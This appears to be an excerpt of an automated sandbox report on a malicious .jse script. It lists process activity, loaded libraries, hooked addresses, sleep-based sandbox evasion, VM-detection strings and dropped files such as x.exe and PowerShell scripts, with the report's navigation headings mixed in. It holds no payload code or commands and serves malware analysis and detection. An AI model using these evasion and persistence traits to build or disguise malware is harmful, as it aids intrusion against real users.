Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00417041 pushfd ; ret	6_2_00417043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00407028 push edi; ret	6_2_0040702E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00414835 push ebp; ret	6_2_0041485A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00403140 push eax; ret	6_2_00403142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040A91A pushfd ; ret	6_2_0040A920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004139A5 push edi; iretd	6_2_004139A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041F2E3 push edi; iretd	6_2_0041F2EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00404AFA push cs; ret	6_2_00404B01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041729F push es; iretd	6_2_004172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00417BD3 push ebp; ret	6_2_00417BE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004183D2 push eax; ret	6_2_004183D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040AC6F push FFFFFFE4h; retf	6_2_0040AC72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041A473 push edi; iretd	6_2_0041A47E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040BD26 push eax; iretd	6_2_0040BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00404E11 push eax; iretd	6_2_00404E13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00411EBA push edi; ret	6_2_00411EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004147C4 push cs; retf	6_2_004147DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040A7D3 push ds; ret	6_2_0040A7DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00417FF9 push ebp; ret	6_2_00418032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026B09AD push ecx; mov dword ptr [esp], ecx	6_2_026B09B6
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_05500580 pushfd ; ret	7_2_05500586
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550DC5F push ebp; ret	7_2_0550DC98
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550A42A push cs; retf	7_2_0550A444
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_054FCC8E push edi; ret	7_2_054FCC94
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550A49B push ebp; ret	7_2_0550A4C0
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550CCA7 pushfd ; ret	7_2_0550CCA9
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_05514F49 push edi; iretd	7_2_05514F54
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_054FA760 push cs; ret	7_2_054FA767
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550CF05 push es; iretd	7_2_0550CF06
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550960B push edi; iretd	7_2_0550960C
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Code function: 7_2_0550198C push eax; iretd	7_2_0550198E

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 11001_10032.jse

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Temp\dddddd.ps1

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\p53ou1[1].ps1

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\356639MM

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgc1zjdg.may.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxgijxad.yqg.psm1

C:\Users\user\AppData\Local\Temp\x.exe

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
11001_10032.jse

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 4390000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3901	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2445	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Window / User API: threadDelayed 3956	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Window / User API: threadDelayed 6016	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\sxstrace.exe	API coverage: 2.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304	Thread sleep count: 3956 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304	Thread sleep time: -7912000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304	Thread sleep count: 6016 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 2304	Thread sleep time: -12032000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe TID: 3196	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sxstrace.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sxstrace.exe	Last function: Thread delayed

Source: W4ja93oMuuBdSP.exe, 0000000C.00000002.2894141957.0000000001169000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: wscript.exe, 00000000.00000003.1762205433.0000023838771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ (T
Source: wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWO
Source: powershell.exe, 00000001.00000002.1757508198.00000240F7179000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.1763354595.0000023838754000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.0000023838754000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1757508198.00000240F7179000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Use
Source: powershell.exe, 00000001.00000002.1757508198.00000240F7179000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
